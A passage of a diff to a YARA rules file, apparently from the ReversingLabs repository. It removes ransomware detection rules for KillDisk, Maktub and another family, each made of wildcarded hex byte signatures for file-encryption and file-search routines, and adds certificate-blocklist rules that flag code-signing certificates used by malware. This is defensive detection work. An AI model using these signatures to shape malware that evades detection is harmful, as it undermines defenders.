-            39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D
-            ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 45 ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45
-            ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D
-            45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ??
-            C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24
-            C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 39 C8 74 ?? 89 04 24 E8 ?? ??
-            ?? ?? 8B 45 ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-        }
-		$encrypt_files_p6 = {
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 8B 00
-            89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 89 85 ?? ?? ?? ?? 0F
-            84 ?? ?? ?? ?? 8D 4D ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 3D ??
-            ?? ?? ?? 77 ?? 83 E0 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 EC ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45
-            ?? 89 04 24 E8 ?? ?? ?? ?? 8D 55 ?? C7 44 24 ?? ?? ?? ?? ?? 89 C1 89 54 24 ?? 8B 45
-            ?? 89 44 24 ?? 89 8D ?? ?? ?? ?? 89 4C 24 ?? 8B 95 ?? ?? ?? ?? 89 14 24 C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 EC ?? 3B 55 ?? 89 95 ?? ?? ?? ?? 0F 85 ?? ?? ??
-            ?? 8B 45 ?? 8B 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C1 E8 ?? 89 8D ?? ?? ?? ?? 85 C0
-            89 85 ?? ?? ?? ?? 74 ?? 8B 45 ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 89 85 ??
-            ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 45 ?? ?? 83 85 ?? ?? ?? ??
-            ?? 8B 55 ?? 39 95 ?? ?? ?? ?? 75 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-        }
-		$encrypt_files_p7 = {
-            C7 44 24 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 4D ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 8B 8D ?? ?? ?? ?? 89 4C 24
-            ?? 8B 95 ?? ?? ?? ?? 89 54 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 83 EC ?? 3B 4D ?? 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 51 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ?? ??
-            ?? ?? 89 14 24 E8 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? C6 45 ??
-            ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 52
-            8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24
-            ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 8B 00 89 04 24 C7
-            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 50 8D 4D ?? 8B 45 ?? 39 C8 74 ?? 89 04 24 E8 ??
-            ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 89 45 ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "42:80:f2:c8:ce:1d:98:e5:f8:da:7e:cb:00:5e:ea:e5" and 1476316800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Killdisk : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2946397Be9C5Ae44E95C99Af : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects KillDisk ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bd04ac88-987a-58f0-8f0a-508662b3c930"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "46bc3ade-544c-5ee1-8d5d-4b8a269120c9"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.KillDisk.yara#L1-L80"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6148e6fc1363ff8995a9100e07139bfa658c72892db4d30a973bad0f2b3e6c3f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16654-L16670"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b7b4925482fcc47dea81eb3d84af31cc572f1b19080b98dda330b0bf6d7c80f4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "KillDisk"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 8B AC 24 ?? ?? ??
-            ?? 56 57 33 FF 8B F1 3B F7 89 7D ?? 89 7D ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56
-            FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 95 C0 84 C0 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 8D
-            4C 24 ?? 89 7C 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? B8 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8B 5C 24 ?? 3B DF 8B 44 24 ?? 89 45 ?? 89 5D ?? 77 ?? 83 F8 ?? 0F 82
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 56 FF 15
-            ?? ?? ?? ?? 8B E8 3B EF 0F 84 ?? ?? ?? ?? 83 FD ?? 0F 84 ?? ?? ?? ?? 8B 0D ?? ?? ??
-            ?? 33 C0 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89
-            44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 6A ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 54
-            24 ?? 57 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            4C 24 ?? 51 8D 54 24 ?? 89 7C 24 ?? 52 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 0F 84 ?? ?? ?? ?? 8B 74 24 ?? 6A ?? 8B C6 05 ?? ?? ?? ?? 50 8B CB 83 D1 ?? 51
-            6A ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 85 C0 89 44 24 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 8D 4C 24 ?? 51 53 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D B4
-            24 ?? ?? ?? ?? 8D 7C 24 ?? 8D 44 24 ?? F3 A5 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 08 89 8C 24 ?? ?? ?? ?? 8B 50 ?? 89 94 24 ?? ?? ?? ?? 8B 48 ?? 89 8C 24
-            ?? ?? ?? ?? 8B 50 ?? 89 94 24 ?? ?? ?? ?? 8B 48 ?? 89 8C 24 ?? ?? ?? ?? 8B 50 ?? 8D
-            74 24 ?? 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 6A ?? 53 50 55 FF 15
-            ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 8D 54 24 ?? 52 55 C7 44 24 ?? ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 8B F0 8B 44 24 ?? F7 DE 1B F6 83 E6 ?? 50 83 C6 ?? FF 15 ??
-            ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B C6 EB ?? 8B 44 24 ?? 50 BE ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 55 FF 15 ?? ?? ?? ?? 8B C6 EB ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 EB
-            ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 EB ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8B C6 EB ?? BE ?? ?? ?? ?? 8B C6 EB ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E
-            5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$app_whitelisting_1 = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 32 DB FF 15
-            ?? ?? ?? ?? 6A ?? 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B E8 85 ED 89 6C 24 ?? 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ??
-            51 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 64 24 ??
-            8B 54 24 ?? 3B 54 24 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 33 FF E8 ?? ?? ?? ?? 85 C0
-            0F 86 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B C1
-            2B C3 C1 F8 ?? 3B C7 0F 86 ?? ?? ?? ?? 3B D9 8B F3 76 ?? E8 ?? ?? ?? ?? 8B 1D ?? ??
-            ?? ?? 8B 0D ?? ?? ?? ?? 89 74 24 ?? 8D 34 BE 3B F1 B8 ?? ?? ?? ?? 8B E8 77 ?? 3B F3
-            73 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 3B 75 ?? 72 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ??
-            ?? 8B 44 24 ?? 39 06 74 ?? B8 ?? ?? ?? ?? 83 C7 ?? E8 ?? ?? ?? ?? 3B F8 72 ?? 8B 6C
-            24 ?? 8B 74 24 ?? FF 15 ?? ?? ?? ?? 3B F0 74 ?? 85 F6 74 ?? 56 6A ?? 6A ?? FF 15 ??
-            ?? ?? ?? 8B F0 85 F6 74 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? EB ?? 8B
-            6C 24 ?? 8D 4C 24 ?? 51 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B3 ?? 55 FF 15
-            ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 8A C3 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ??
-            ?? ?? C3
-        }
-		$app_whitelisting_2 = {
-            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 56 A1 ?? ?? ?? ?? 33 C4 50 8D 44
-            24 ?? 64 A3 ?? ?? ?? ?? 8D 44 24 ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 70 ?? C7 44
-            24 ?? ?? ?? ?? ?? 56 C7 06 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 8B 36 EB
-            ?? 33 F6 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 72 ?? 8B 4C 24
-            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 64 89 0D
-            ?? ?? ?? ?? 59 5E 83 C4 ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_files and $app_whitelisting_1 and $app_whitelisting_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "29:46:39:7b:e9:c5:ae:44:e9:5c:99:af" and 1476092708 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Maktub : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2Df453588177Cf1C0C297Ff4 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Maktub ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "23ca4232-77ff-5519-b6b0-ccec6cb35fe1"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "c3a18989-239e-56d7-b1c2-92895c02b7d8"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Maktub.yara#L1-L116"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ee3213213e9521f7d19ce6340cd2f98057c22b1188ceefc30c17c18b6ec54e20"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16672-L16688"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b0c82388fd87a89841d190ce4020cc5a2ea21c9d765ceca6bc25d64162479231"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Maktub"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 8B ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 51 8D B3 ?? ?? ?? ?? 8B CB 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 50 8B 43 ?? FF D0 8D
-            45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B 43 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            B3 ?? ?? ?? ?? FF D0 85 C0 74 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B 43 ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF D0 85 C0 75 ?? FF 75 ?? 8B 43
-            ?? FF D0 5E 33 C0 5B 8B E5 5D C3 A1 ?? ?? ?? ?? 57 8B 7D ?? 85 C0 75 ?? FF 15 ?? ??
-            ?? ?? A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? 85 C9 74
-            ?? 8B D1 33 C0 C1 E9 ?? F3 AB 8B CA 83 E1 ?? F3 AA 8B 7D ?? B9 ?? ?? ?? ?? 3B FE 76
-            ?? 8D 46 ?? 3B F8 73 ?? 8D 57 ?? 8D 70 ?? 8B FF 8A 06 8D 52 ?? 88 42 ?? 8D 76 ?? 49
-            75 ?? EB ?? 8B D7 2B D6 8A 06 8D 76 ?? 88 44 32 ?? 49 75 ?? E8 ?? ?? ?? ?? 89 83 ??
-            ?? ?? ?? 8D 4F ?? 8B 83 ?? ?? ?? ?? 89 47 ?? FF B3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 45 ?? FF 75 ?? 50 8B 43 ?? 57 6A ?? 6A ?? 6A ?? FF 75 ?? FF D0 85 C0 75 ?? A1
-            ?? ?? ?? ?? 85 C0 75 ?? A1 ?? ?? ?? ?? FF D0 A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ??
-            ?? ?? FF 75 ?? 8B 43 ?? FF D0 5F 5E 33 C0 5B 8B E5 5D C3 FF 75 ?? 8D 45 ?? 57 50 E8
-            ?? ?? ?? ?? 50 8D 8B ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 85 C0 75 ?? A1 ?? ?? ?? ?? FF D0 A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? ?? ?? FF
-            75 ?? 8B 43 ?? FF D0 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
-        }
-		$search_files = {
-            55 8B EC 83 EC ?? 53 56 57 8B F9 68 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 85 C0 0F 84
-            ?? ?? ?? ?? 8B 47 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ??
-            FF D0 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 4F ?? 8D 45 ?? 50 0F 57 C0 53 66 0F 13 45
-            ?? FF D1 85 C0 0F 84 ?? ?? ?? ?? 8B 75 ?? 8B C6 0B 45 ?? 0F 84 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 6A ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? FF
-            72 ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 87 ?? ?? ?? ??
-            8B 55 ?? 8D 4A ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? FF 70 ?? 50 FF 31 8D 4D ?? E8 ?? ??
-            ?? ?? 8B 45 ?? 83 C0 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ??
-            FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 75 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 45 ?? 85 C0
-            7C ?? 7F ?? 81 FE ?? ?? ?? ?? 72 ?? 50 8B 45 ?? 56 53 8B 1D ?? ?? ?? ?? 33 F6 51 8D
-            48 ?? 89 65 ?? 39 31 7C ?? 51 8D 70 ?? FF D3 8B 4D ?? 8D 46 ?? 51 33 F6 89 65 ?? 89
-            01 8B 45 ?? 39 70 ?? 8D 48 ?? 7C ?? 51 8D 70 ?? FF D3 8B 4D ?? 8D 46 ?? 89 01 8B CF
-            E8 ?? ?? ?? ?? 8B 75 ?? 8B F8 E9 ?? ?? ?? ?? 8B 75 ?? 8B 47 ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 6A ?? 68 ?? ?? ?? ?? 56 FF D0 89 45 ?? 83 F8 ?? 75 ?? 8B 47 ?? 53 FF D0 33 FF E9
-            ?? ?? ?? ?? 51 8D 87 ?? ?? ?? ?? 8B CF 50 E8 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ??
-            ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? C7 45
-            ?? ?? ?? ?? ?? 51 FF 75 ?? 50 8B 47 ?? 53 FF D0 85 C0 75 ?? 8B 4D ?? E9 ?? ?? ?? ??
-            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ??
-            ?? ?? ?? ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 85 C0 74 ?? E8 ?? ?? ?? ??
-            8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 8B 47 ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF D0
-            85 C0 75 ?? 8B 4D ?? EB ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 8B 47 ?? 6A ?? 6A ?? 6A ??
-            FF 75 ?? FF D0 85 C0 75 ?? 8B 4D ?? EB ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF
-            75 ?? 8B 45 ?? 50 FF 75 ?? 8B 47 ?? FF D0 8B 4D ?? 85 C0 74 ?? 8B 45 ?? 3B 45 ?? 74
-            ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 8B 47 ?? 53 FF D0 FF 75 ?? 8B 47 ?? FF D0
-            8B 47 ?? 56 FF D0 33 FF E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 FF 75
-            ?? 8B 47 ?? FF D0 8B 47 ?? 53 FF D0 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ??
-            ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ??
-            ?? ?? ?? 6A ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 45
-            ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 85 C0 75 ??
-            8B 47 ?? 56 FF D0 33 FF EB ?? BF ?? ?? ?? ?? 83 C6 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ??
-            85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B 1D ?? ??
-            ?? ?? 56 6A ?? 50 FF D3 EB ?? 8B 47 ?? 53 FF D0 33 FF 8B 1D ?? ?? ?? ?? 8B 75 ?? 83
-            C6 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? 56 6A ?? 50 FF D3 8B C7 5F 5E 5B 8B E5 5D C2
-        }
-		$previous_encrypt_files = {
-            0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8D 4D
-            ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF
-            77 ?? FF D3 8D 4D ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6
-            0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0
-            8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ??
-            FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF
-            30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89
-            B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6
-            0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0
-            8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7
-            ?? ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D
